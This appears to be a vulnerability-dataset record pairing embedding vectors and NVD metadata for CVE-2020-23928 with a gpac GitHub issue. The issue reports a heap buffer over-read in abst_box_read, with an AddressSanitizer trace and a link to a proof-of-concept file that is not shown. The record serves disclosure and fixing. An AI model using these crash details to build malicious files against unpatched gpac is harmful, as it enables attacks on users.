-0.0013019321486353874, -0.019255466759204865, -0.023310784250497818, 0.0166443083435297, -0.008023111149668694, 0.012362885288894176, 0.0017076462972909212, 0.01203466672450304, -0.029466699808835983, 0.016921469941735268, -0.014711468480527401, 0.005583356134593487, -0.004310598596930504, 0.01814681850373745, 0.0005283401114866138, 0.011524105444550514, -0.005287959706038237, 0.011225061491131783, -0.023646296933293343, -0.006593538448214531, -0.004905038513243198, -0.0007115952321328223, -0.006790469400584698, -0.010831199586391449, -0.00561982486397028, -0.005937102250754833, -0.004762810654938221, 0.01224618498235941, -0.023777583613991737, -0.006823291536420584, 0.0010876785963773727, 0.002244647592306137, -0.01538978610187769, 0.004398123826831579, 0.002273822668939829, -0.010678031481802464, -0.01654219627380371, 0.005732877645641565, 0.020495401695370674, 0.011334467679262161, 0.009306808933615685, -0.013544470071792603, 0.013311070390045643, 0.02701600268483162, 0.0010867668315768242, 0.017650844529271126, -0.00811793003231287, -0.015068861655890942, -0.002224589930847287, 0.007023869082331657, 0.012107604183256626, 0.019503453746438026, 0.015287673100829124, 0.009197402745485306, -0.0018644615774974227, -0.005218669306486845, -0.021574875339865685, 0.03824836015701294, 0.012574403546750546, 0.0023011742159724236, -0.01536061055958271, -0.0006851554499007761, -0.013077670708298683, -0.0166443083435297, -0.007760536391288042, -0.018015531823039055, 0.0017650844529271126, -0.005258784629404545, 0.002075068186968565, -0.012851565144956112, 0.00013744136958848685, 0.02412768267095089, 0.020451638847589493, 0.02433190867304802, -0.012727571651339531, 0.0019091357244178653, -0.003411645768210292, -0.012807803228497505, -0.01064156275242567, 0.020947614684700966, -0.009824664331972599, 0.021020550280809402, -0.003741687163710594, 0.006557069718837738, 0.006826938129961491, -0.00011806737165898085, -0.01784048229455948, -0.005867811851203442, -0.0018963717157021165, 0.0029357292223721743, 0.006768588442355394, 0.00021516525885090232, 0.0005862341495230794, 0.000362179649528116, 0.0228439848870039, 0.028926962986588478, 0.023850521072745323, -0.01943051628768444, -0.020626690238714218, 0.011327174492180347, 0.02557184360921383, 0.007643836550414562, -0.016002459451556206, -0.01975144073367119, 0.0008159868884831667, 0.00788453035056591, 0.009664202108979225, -0.03792743384838104, 0.021429000422358513, -0.002100596437230706, -0.001900018542073667, 0.020174477249383926, 0.013464239425957203, -0.00819816067814827, 0.02406933344900608, -0.009569383226335049, -0.018423980101943016, -0.011035424657166004, -0.01999942772090435, 0.016177508980035782 ]
1,805
CVE-2020-23928
2021-04-21T18:15:08.383000
An issue was discovered in gpac before 1.0.1. The abst_box_read function in box_code_adobe.c has a heap-based buffer over-read.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Technical Description" ], "url": "https://cwe.mitre.org/data/definitions/126.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/8e05648d6b4459facbc783025c5c42d301fef5c3" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1568" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1569" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "CCA1FE1D-17AE-45F9-A7BD-A8316EE859D6", "versionEndExcluding": "1.0.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1569
[ "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
## System info Ubuntu x86_64, gcc (Ubuntu 5.5.0-12ubuntu1), MP4Box (latest master [2aa266](https://github.com/gpac/gpac/commit/2aa266dfaab6aaad9f9f4f216ad7d1e62adc7fa0)) ## Configure CFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address" ./configure --static-mp4box ## Command line ./bin/gcc/MP4Box -diso -out /dev/null @@ ## AddressSanitizer output ``` ================================================================= ==73339==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60300000e2d3 at pc 0x7f61cb5fc3d5 bp 0x7ffc8913b6b0 sp 0x7ffc8913ae58 READ of size 20 at 0x60300000e2d3 thread T0 #0 0x7f61cb5fc3d4 in strdup (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x623d4) #1 0x56330736c407 in abst_box_read isomedia/box_code_adobe.c:141 #2 0x56330715bb64 in gf_isom_box_read isomedia/box_funcs.c:1681 #3 0x56330715bb64 in gf_isom_box_parse_ex isomedia/box_funcs.c:259 #4 0x56330715d041 in gf_isom_parse_root_box isomedia/box_funcs.c:38 #5 0x5633071946f5 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:259 #6 0x56330719f951 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:247 #7 0x56330719f951 in gf_isom_open_file isomedia/isom_intern.c:740 #8 0x563306ac97e3 in mp4boxMain /home/seviezhou/gpac/applications/mp4box/main.c:5331 #9 0x7f61ca5c6b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #10 0x563306a9af09 in _start (/home/seviezhou/gpac/bin/gcc/MP4Box+0x27ff09) 0x60300000e2d3 is located 0 bytes to the right of 19-byte region [0x60300000e2c0,0x60300000e2d3) allocated by thread T0 here: #0 0x7f61cb632612 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98612) #1 0x56330736a3a9 in abst_box_read isomedia/box_code_adobe.c:97 SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 strdup Shadow bytes around the buggy address: 0x0c067fff9c00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9c10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9c20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9c30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9c40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c067fff9c50: fa fa fa fa fa fa fa fa 00 00[03]fa fa fa 00 00 0x0c067fff9c60: 04 fa fa fa 00 00 00 07 fa fa 00 00 00 fa fa fa 0x0c067fff9c70: 00 00 00 06 fa fa 00 00 00 fa fa fa 00 00 00 fa 0x0c067fff9c80: fa fa 00 00 00 07 fa fa 00 00 00 fa fa fa 00 00 0x0c067fff9c90: 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa 0x0c067fff9ca0: 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==73339==ABORTING ``` ## POC [heap-overflow-abst_box_read-box_code_adobe-141.zip](https://github.com/gpac/gpac/files/5042085/heap-overflow-abst_box_read-box_code_adobe-141.zip)
A heap-buffer-overflow in box_code_adobe.c:141
https://api.github.com/repos/gpac/gpac/issues/1569/comments
1
2020-08-07T14:53:11
2020-09-01T15:16:27Z
https://github.com/gpac/gpac/issues/1569
675,069,002
1,569
true
This is a GitHub Issue repo:gpac owner:gpac Title : A heap-buffer-overflow in box_code_adobe.c:141 Issue date: --- start body --- ## System info Ubuntu x86_64, gcc (Ubuntu 5.5.0-12ubuntu1), MP4Box (latest master [2aa266](https://github.com/gpac/gpac/commit/2aa266dfaab6aaad9f9f4f216ad7d1e62adc7fa0)) ## Configure CFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address" ./configure --static-mp4box ## Command line ./bin/gcc/MP4Box -diso -out /dev/null @@ ## AddressSanitizer output ``` ================================================================= ==73339==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60300000e2d3 at pc 0x7f61cb5fc3d5 bp 0x7ffc8913b6b0 sp 0x7ffc8913ae58 READ of size 20 at 0x60300000e2d3 thread T0 #0 0x7f61cb5fc3d4 in strdup (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x623d4) #1 0x56330736c407 in abst_box_read isomedia/box_code_adobe.c:141 #2 0x56330715bb64 in gf_isom_box_read isomedia/box_funcs.c:1681 #3 0x56330715bb64 in gf_isom_box_parse_ex isomedia/box_funcs.c:259 #4 0x56330715d041 in gf_isom_parse_root_box isomedia/box_funcs.c:38 #5 0x5633071946f5 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:259 #6 0x56330719f951 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:247 #7 0x56330719f951 in gf_isom_open_file isomedia/isom_intern.c:740 #8 0x563306ac97e3 in mp4boxMain /home/seviezhou/gpac/applications/mp4box/main.c:5331 #9 0x7f61ca5c6b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #10 0x563306a9af09 in _start (/home/seviezhou/gpac/bin/gcc/MP4Box+0x27ff09) 0x60300000e2d3 is located 0 bytes to the right of 19-byte region [0x60300000e2c0,0x60300000e2d3) allocated by thread T0 here: #0 0x7f61cb632612 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98612) #1 0x56330736a3a9 in abst_box_read isomedia/box_code_adobe.c:97 SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 strdup Shadow bytes around the buggy address: 0x0c067fff9c00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9c10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9c20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9c30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9c40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c067fff9c50: fa fa fa fa fa fa fa fa 00 00[03]fa fa fa 00 00 0x0c067fff9c60: 04 fa fa fa 00 00 00 07 fa fa 00 00 00 fa fa fa 0x0c067fff9c70: 00 00 00 06 fa fa 00 00 00 fa fa fa 00 00 00 fa 0x0c067fff9c80: fa fa 00 00 00 07 fa fa 00 00 00 fa fa fa 00 00 0x0c067fff9c90: 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa 0x0c067fff9ca0: 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==73339==ABORTING ``` ## POC [heap-overflow-abst_box_read-box_code_adobe-141.zip](https://github.com/gpac/gpac/files/5042085/heap-overflow-abst_box_read-box_code_adobe-141.zip) --- end body ---
3,581
[ -0.022147733718156815, 0.04269733279943466, -0.008699280209839344, 0.012739846482872963, 0.028811654075980186, 0.02689690701663494, -0.02917349524796009, 0.04357178509235382, -0.020398830994963646, 0.018122242763638496, -0.014315366744995117, 0.012996151112020016, 0.02949010767042637, 0.014805360697209835, 0.02578122913837433, 0.009287272579967976, -0.007655215449631214, 0.02250957489013672, 0.0015415968373417854, 0.004745404701679945, 0.03790292888879776, -0.03820446506142616, -0.01179755013436079, 0.0414610393345356, -0.018061935901641846, 0.02496708370745182, -0.020715443417429924, 0.008480667136609554, 0.0038935686461627483, 0.0369681715965271, -0.011993547901511192, 0.015069203451275826, -0.01090802252292633, 0.016780413687229156, 0.03163100406527519, 0.012362928129732609, 0.04345117136836052, 0.07936397194862366, -0.011578937992453575, 0.015378276817500591, 0.0080283647403121, -0.06392538547515869, -0.025389233604073524, 0.013508760370314121, 0.004149873275309801, 0.007817290723323822, 0.02780151180922985, -0.004538099281489849, -0.04345117136836052, -0.005672623869031668, 0.030681168660521507, -0.007338603958487511, -0.02487662434577942, -0.04930094629526138, -0.004364716820418835, -0.01711210235953331, 0.02639937400817871, 0.01988622173666954, 0.007210451643913984, 0.021996965631842613, -0.017865939065814018, 0.019554534927010536, 0.009302349761128426, 0.027726128697395325, -0.011300018057227135, -0.00624930951744318, 0.014609362930059433, 0.03331959992647171, -0.015453659929335117, 0.032776836305856705, 0.00004517133129411377, -0.03250545635819435, 0.029761487618088722, 0.05089908093214035, 0.007764521986246109, -0.013878140598535538, 0.03313867747783661, 0.0160868838429451, -0.03585249185562134, 0.03962167724967003, -0.05279874801635742, 0.033651288598775864, -0.031902384012937546, 0.04064689576625824, 0.014209829270839691, 0.006569690071046352, -0.041913341730833054, -0.07912274450063705, -0.02490677684545517, -0.04414470121264458, 0.01125478744506836, 0.019464073702692986, 0.010576334781944752, 0.0005036573857069016, 0.009392810054123402, 0.01655426248908043, -0.026112915948033333, -0.010870330967009068, -0.0508086197078228, -0.009664191864430904, -0.02662552520632744, -0.01938869059085846, -0.01760963350534439, 0.003448804607614875, -0.006871224846690893, 0.010327568277716637, 0.003314998699352145, -0.02443939819931984, 0.004651174880564213, 0.12616217136383057, 0.009151582606136799, 0.01935853622853756, 0.006166387349367142, 0.049632634967565536, -0.0021936658304184675, 0.0162074975669384, -0.011375402100384235, -0.013629375025629997, -0.0370887853205204, -0.02222311682999134, -0.001631114981137216, -0.03621433302760124, -0.027228595688939095, 0.019675148651003838, -0.004455177113413811, 0.031842079013586044, -0.0014869436854496598, 0.000356423610355705, -0.012958459556102753, -0.02926395647227764, -0.047612350434064865, -0.032354686409235, -0.0009220369975082576, -0.02437909133732319, -0.015046588145196438, -0.00832236185669899, -0.02449970506131649, 0.03868691995739937, 0.017685018479824066, 0.03681740164756775, -0.06682012230157852, -0.022871417924761772, 0.021891428157687187, 0.0034638813231140375, -0.015453659929335117, 0.00857112742960453, 0.008141440339386463, 0.03799339011311531, -0.036485716700553894, -0.010320030152797699, 0.011661860160529613, -0.026097839698195457, 0.006750611122697592, 0.04064689576625824, 0.06012604758143425, 0.010696948505938053, 0.030560554936528206, 0.03307837247848511, -0.01702164113521576, -0.015204894356429577, -0.0063246930949389935, -0.04242595285177231, 0.012257390655577183, -0.014601824805140495, -0.03319898620247841, -0.030786706134676933, 0.05394458398222923, 0.01953945681452751, -0.006701611913740635, 0.025389233604073524, 0.0021993196569383144, 0.000729808525647968, 0.021936658769845963, 0.023745868355035782, -0.056809164583683014, -0.012242314405739307, 0.0321737676858902, 0.018770543858408928, -0.03449558466672897, -0.003090732032433152, -0.024831393733620644, 0.02281111106276512, 0.021966813132166862, 0.004112181253731251, 0.010206954553723335, -0.013523837551474571, 0.023791098967194557, -0.05174337700009346, 0.019177615642547607, -0.0028306583408266306, -0.006426461040973663, -0.01531796995550394, -0.002655391115695238, -0.013508760370314121, 0.06965454667806625, -0.01626780442893505, -0.03443527966737747, -0.0022916647139936686, -0.00011978942347923294, 0.024710780009627342, 0.0066186897456645966, -0.01077233161777258, -0.035581111907958984, 0.009686806239187717, -0.031962692737579346, 0.011352786794304848, -0.011639244854450226, 0.03621433302760124, 0.024394167587161064, 0.0019392459653317928, -0.014360596425831318, -0.011541245505213737, 0.014232444576919079, 0.0007067222613841295, -0.010214492678642273, 0.016976410523056984, -0.03337990492582321, -0.0029550413601100445, -0.037480778992176056, -0.008699280209839344, 0.026851676404476166, -0.005699008237570524, 0.002478239359334111, -0.022675419226288795, -0.035731878131628036, -0.0046134828589856625, -0.020640060305595398, 0.01482043694704771, -0.0073046814650297165, 0.009618961252272129, 0.023338796570897102, 0.02415294013917446, 0.02449970506131649, 0.004285563714802265, 0.027319056913256645, -0.002442432101815939, -0.0021484356839209795, 0.007817290723323822, 0.003232076531276107, 0.010696948505938053, -0.021062208339571953, 0.02973133511841297, -0.015604428015649319, -0.025419386103749275, 0.015996422618627548, 0.07092099636793137, -0.015197355300188065, -0.009965726174414158, -0.019494228065013885, 0.01126986462622881, 0.005861083511263132, 0.0021201667841523886, 0.00741775706410408, 0.00411595031619072, 0.0020862440578639507, -0.0007020108168944716, 0.017383484169840813, 0.005834699142724276, -0.005307013168931007, -0.014202291145920753, 0.01745886728167534, 0.001808266737498343, -0.027575360611081123, 0.009174196980893612, -0.0023161645513027906, -0.012528772465884686, 0.001631114981137216, 0.010553719475865364, -0.012619232758879662, -0.00899327639490366, 0.03998351842164993, -0.016041653230786324, -0.016780413687229156, -0.026414452120661736, 0.0006473576067946851, 0.01895146444439888, 0.001207081601023674, 0.0161773432046175, 0.009279734455049038, -0.004379793535917997, -0.010817562229931355, 0.003999105654656887, 0.008608819916844368, 0.018815774470567703, -0.0010544296819716692, -0.026972291991114616, -0.0005220322054810822, 0.02231357805430889, -0.01476013008505106, 0.011563860811293125, 0.0024801241233944893, 0.007741906680166721, -0.04070720449090004, 0.0185443926602602, 0.01325999479740858, 0.015981346368789673, -0.006219156086444855, 0.004296871367841959, -0.01586073264479637, 0.008148979395627975, -0.03083193674683571, 0.007044607773423195, -0.022238194942474365, -0.0006256847991608083, -0.034676507115364075, 0.018710236996412277, -0.049421560019254684, 0.01525766309350729, -0.015204894356429577, -0.0035958029329776764, 0.04055643454194069, -0.05469841882586479, -0.03356082737445831, -0.0029776564333587885, -0.024484628811478615, -0.015129510313272476, 0.002065513515844941, -0.010395413264632225, -0.00988280400633812, 0.01614719070494175, -0.022208040580153465, 0.019629918038845062, -0.025675691664218903, 0.01209154725074768, 0.03431466594338417, 0.00790021289139986, -0.033681441098451614, 0.010252184234559536, -0.07791659981012344, 0.013516299426555634, -0.009083736687898636, -0.019840992987155914, 0.014518902637064457, -0.04179272800683975, 0.00808867160230875, -0.018031783401966095, -0.030997781082987785, 0.005069554317742586, 0.008442975580692291, 0.006705380976200104, -0.008880200795829296, 0.017971476539969444, 0.02599230222404003, 0.004443869460374117, -0.0230674147605896, -0.013832910917699337, 0.005533164367079735, -0.007368757389485836, -0.004029259085655212, -0.001190120354294777, 0.0010157955111935735, 0.03681740164756775, 0.014451056718826294, 0.045742835849523544, 0.0026911983732134104, -0.013395684771239758, -0.015197355300188065, -0.015694888308644295, 0.006603613030165434, -0.01652410812675953, -0.01381029561161995, -0.024243401363492012, -0.003394151572138071, 0.013222302310168743, 0.011948318220674992, 0.008020826615393162, 0.004734097048640251, -0.010071263648569584, -0.010320030152797699, 0.004048105329275131, -0.05020555108785629, 0.045592065900564194, -0.029761487618088722, 0.02590184286236763, 0.0009366425801999867, -0.029414722695946693, 0.005661316681653261, 0.020609905943274498, -0.02017267979681492, 0.017036717385053635, -0.03907891362905502, 0.030726399272680283, 0.03910906985402107, -0.050326164811849594, 0.010342644527554512, 0.008216824382543564, -0.024273553863167763, 0.040315207093954086, -0.020866211503744125, -0.038174308836460114, -0.05427626892924309, 0.05647747591137886, -0.0232181828469038, -0.05843745172023773, -0.018031783401966095, 0.032053153961896896, -0.016313035041093826, -0.023429255932569504, 0.023142797872424126, -0.051260922104120255, 0.04999447613954544, -0.007870059460401535, -0.00022744678426533937, 0.025766151025891304, -0.005491703283041716, 0.04257671907544136, 0.0009112005936913192, -0.005356012377887964, 0.031751617789268494, -0.001624518889002502, 0.02443939819931984, 0.010749717243015766, -0.011631706729531288, 0.010674333199858665, 0.03950106352567673, 0.014081676490604877, -0.00967926811426878, 0.0043760244734585285, -0.04185303673148155, 0.041189659386873245, -0.022298501804471016, -0.009988341480493546, 0.004609713796526194, 0.0072142211720347404, 0.027635667473077774, 0.03347036615014076, -0.00940034817904234, 0.01929822936654091, 0.02362525463104248, -0.00900835357606411, 0.004387331660836935, -0.0003498275182209909, -0.021589893847703934, -0.007598677650094032, 0.0073951417580246925, -0.03639525547623634, -0.045682527124881744, -0.04887879639863968, -0.02397201955318451, -0.001687652780674398, -0.01886100322008133, 0.02400217205286026, -0.0011024867417290807, -0.039320141077041626, 0.020836057141423225, -0.05843745172023773, -0.025132928043603897, -0.00940034817904234, 0.01751917414367199, -0.010802485048770905, -0.02908303402364254, 0.008985738269984722, -0.01276246178895235, -0.00012108508235542104, 0.010304952971637249, -0.010350183583796024, -0.022841263562440872, -0.01022203080356121, 0.025826457887887955, 0.0006690304144285619, 0.002186127472668886, 0.006166387349367142, 0.016478879377245903, -0.008035903796553612, 0.03630479425191879, 0.046768054366111755, -0.015408430248498917, -0.024514781311154366, 0.002706275088712573, -0.01982591487467289, 0.0012890613870695233, 0.016780413687229156, 0.008736971765756607, -0.01623765006661415, 0.006822225637733936, 0.031148549169301987, 0.013267532922327518, -0.021016977727413177, -0.016855796799063683, -0.06350323557853699, -0.005261783022433519, -0.026595372706651688, -0.0151144340634346, 0.003239614889025688, 0.00955111626535654, -0.017006564885377884, -0.02852519601583481, 0.0037503396160900593, 0.0026855445466935635, 0.006641304586082697, 0.03901860862970352, 0.0067204576916992664, -0.0068561481311917305, -0.027138134464621544, 0.01723271608352661, 0.0006044831243343651, -0.02727382630109787, 0.0160567294806242, 0.025419386103749275, 0.017383484169840813, -0.002919234102591872, -0.03341006115078926, 0.0160567294806242, 0.00552562577649951, 0.030907319858670235, -0.04604436829686165, -0.04324009642004967, 0.04908987134695053, -0.005913851782679558, -0.02067021280527115, -0.026474758982658386, -0.007123760413378477, 0.006754380185157061, -0.023987095803022385, -0.01985606923699379, -0.021921582520008087, 0.02362525463104248, -0.0033771900925785303, 0.037360165268182755, 0.021936658769845963, -0.008970661088824272, -0.016780413687229156, -0.01947914995253086, 0.0278618186712265, 0.029791641980409622, 0.0005846949061378837, 0.02216280996799469, -0.009656652808189392, 0.03226422891020775, -0.010440643876791, -0.011224634014070034, 0.0023067414294928312, -0.020594829693436623, 0.011586476117372513, 0.0059816972352564335, -0.01454151701182127, -0.0004237977846059948, 0.01953945681452751, 0.012566464021801949, -0.01483551412820816, -0.01991637609899044, 0.03992321342229843, -0.031781770288944244, 0.026203377172350883, -0.03083193674683571, 0.012581541202962399, 0.0017724594799801707, 0.017066871747374535, -0.005910082720220089, -0.003051155712455511, 0.0026308915112167597, -0.005427626892924309, 0.010727101936936378, 0.023987095803022385, 0.009777267463505268, 0.012061393819749355, -0.01209154725074768, 0.0012805807637050748, 0.004888633731752634, 0.018288087099790573, 0.002146551152691245, -0.0016075576422736049, 0.0005950601771473885, -0.014375673606991768, -0.007945442572236061, -0.0021126284264028072, -0.008623896166682243, 0.03530972823500633, -0.029158418998122215, -0.008631434291601181, 0.005650009028613567, -0.006320924032479525, 0.04544129967689514, -0.007922828197479248, -0.00016690423944965005, 0.00267989095300436, 0.0056387013755738735, -0.007772060576826334, -0.0004848114913329482, -0.03313867747783661, 0.004930094350129366, -0.042064107954502106, -0.0161773432046175, -0.0006662035011686385, 0.021243128925561905, -0.02920364961028099, -0.003220768878236413, 0.029158418998122215, -0.00419133435934782, -0.011865396052598953, 0.008118825033307076, 0.01792624592781067, -0.01723271608352661, -0.019343459978699684, -0.001578346360474825, -0.01792624592781067, 0.017881015315651894, -0.0015293470351025462, -0.0005097823450341821, 0.006060850340873003, -0.02353479340672493, 0.05168307200074196, 0.007817290723323822, -0.023776022717356682, -0.02278095670044422, 0.01938869059085846, 0.021303435787558556, 0.0001259143464267254, -0.022419115528464317, 0.050356317311525345, 0.00000897390054888092, 0.022298501804471016, 0.03135962411761284, -0.01194077916443348, 0.012528772465884686, -0.02225327119231224, 0.02537415735423565, 0.01388567965477705, -0.0023783559445291758, 0.019313305616378784, 0.02945995330810547, -0.05846760421991348, 0.02020283415913582, -0.02581138163805008, 0.008623896166682243, 0.019675148651003838, -0.020021913573145866, -0.03862661123275757, -0.014767668209969997, -0.01748901978135109, -0.011307556182146072, 0.04884864389896393, 0.02038375474512577, -0.030319327488541603, -0.021996965631842613, 0.008352515287697315, 0.032354686409235, -0.01203124038875103, -0.016192421317100525, -0.009324965067207813, -0.003857761388644576, -0.00014735158765688539, -0.021152669563889503, -0.008262054063379765, -0.021016977727413177, 0.007975596003234386, 0.00886512454599142, -0.014767668209969997, 0.02478616312146187, 0.022886494174599648, -0.03687771037220955, -0.015981346368789673, 0.007764521986246109, 0.017820708453655243, 0.02228342369198799, -0.007466756273061037, 0.041008736938238144, 0.04339086264371872, -0.0007802213658578694, -0.014948589727282524, -0.009618961252272129, -0.04547145217657089, -0.01203124038875103, 0.0037107630632817745, 0.006094772834330797, -0.0005446472787298262, -0.030937474220991135, -0.0029720028396695852, 0.024484628811478615, 0.017760401591658592, -0.0011316979071125388, 0.003375305561348796, 0.019901299849152565, 0.0006402903818525374, -0.0013248686445876956, -0.02671598643064499, 0.009422963485121727, 0.02835935167968273, -0.02344433404505253, -0.0060796961188316345, 0.002866465598344803, 0.0012664463138207793, 0.014669669792056084, 0.002546084811910987, -0.038445692509412766, 0.008842509239912033, 0.003273537615314126, -0.014466133899986744, -0.03353067487478256, -0.024952007457613945, 0.038294922560453415, -0.015468737110495567, 0.025087697431445122, 0.02967102825641632, -0.003051155712455511, -0.02581138163805008, 0.006660150829702616, -0.0007651446503587067, -0.0060344659723341465, -0.005533164367079735, -0.036636482924222946, 0.012822768650949001, -0.0016631530597805977, -0.027982432395219803, 0.014677207916975021, 0.022238194942474365, -0.002992733148857951, 0.015559197403490543, 0.018680082634091377, -0.012310159392654896, -0.01346353068947792, 0.014737514778971672, -0.020142527297139168, 0.030756553635001183, 0.007707984186708927, -0.0255249235779047, -0.0003627841069828719, -0.015137048438191414, -0.00830728467553854, 0.015129510313272476, -0.02400217205286026, -0.025766151025891304, -0.018288087099790573, -0.03941060230135918, -0.0033828439190983772, -0.0064679221250116825, -0.009030967950820923, 0.010463259182870388, 0.005216552875936031, 0.012106623500585556, -0.015996422618627548, -0.027590436860919, 0.01003357209265232, 0.009988341480493546, 0.0065131522715091705, -0.0016980180516839027, 0.023821251466870308, -0.0052504753693938255, 0.00995818804949522, 0.03512880951166153, 0.002442432101815939, -0.00528439786285162, 0.015513967722654343, -0.03344021365046501, 0.002380240708589554, -0.012958459556102753, 0.006362385116517544, 0.0017903631087392569, -0.04881849139928818, 0.030243944376707077, 0.014013831503689289, 0.0366666354238987, 0.007670292165130377, -0.03449558466672897, -0.030620861798524857, -0.003450689371675253, 0.023760944604873657, 0.0019213423365727067, 0.0045682527124881744, -0.006905147805809975, -0.0026120455004274845, 0.009732036851346493, -0.0009625557577237487, 0.005378627683967352, 0.001418155967257917, -0.0005206187488511205, 0.016780413687229156, -0.0034469200763851404, 0.02829904481768608, -0.004779327195137739, 0.012378005310893059, -0.003313113935291767, -0.03533988445997238, 0.008405283093452454, 0.017911169677972794, -0.04227518290281296, 0.013455991633236408, 0.015875808894634247, 0.01883085072040558, 0.025389233604073524, -0.021740661934018135, 0.002992733148857951, -0.053100284188985825, 0.022057272493839264, -0.00032768354867585003, -0.011096482165157795, 0.02861565537750721, -0.013365531340241432, -0.004590868018567562, 0.002947503002360463, 0.010206954553723335, -0.0023029723670333624, 0.03506850078701973, -0.026731062680482864, -0.00580454571172595, -0.01886100322008133, 0.00765898497775197, -0.0027496207039803267, -0.006984300445765257, -0.002059859922155738, 0.015951192006468773, 0.0230975691229105, -0.025826457887887955, -0.03998351842164993, -0.01264184806495905, -0.019192691892385483, -0.018710236996412277, 0.02359510026872158, -0.014948589727282524, 0.005732931196689606, -0.0030662324279546738, 0.0004980036173947155, 0.028027663007378578, 0.003857761388644576, 0.008721895515918732, 0.000675626506563276, 0.013682142831385136, -0.018348393961787224, 0.008073595352470875, 0.014850590378046036, -0.00808867160230875, 0.006075927056372166, 0.009762190282344818, -0.056839317083358765, 0.01338814664632082, -0.01953945681452751, 0.002282241825014353, 0.014488749206066132, 0.010794946923851967, 0.01702164113521576, -0.017594557255506516, -0.01901177130639553, 0.0015368853928521276, 0.03781246766448021, 0.0011411209125071764, 0.021620048210024834, -0.012792615219950676, -0.007312219589948654, -0.011616629548370838, 0.03292760252952576, -0.03395282104611397, 0.005367320030927658, -0.017594557255506516, -0.02531384862959385, 0.0025762382429093122, -0.03057563304901123, -0.005732931196689606, 0.0023482025135308504, 0.0033338444773107767, -0.010372797958552837, 0.02137882076203823, 0.037330012768507004, -0.017745325341820717, 0.019524380564689636, -0.011639244854450226, 0.014511363580822945, -0.013938447460532188, -0.01994652859866619, 0.037631548941135406, -0.007772060576826334, 0.031962692737579346, 0.02391171269118786, -0.010531104169785976, 0.005137399770319462, 0.0255249235779047, 0.004794403910636902, -0.0016697491519153118, -0.04218472167849541, 0.013056457974016666, -0.028630733489990234, 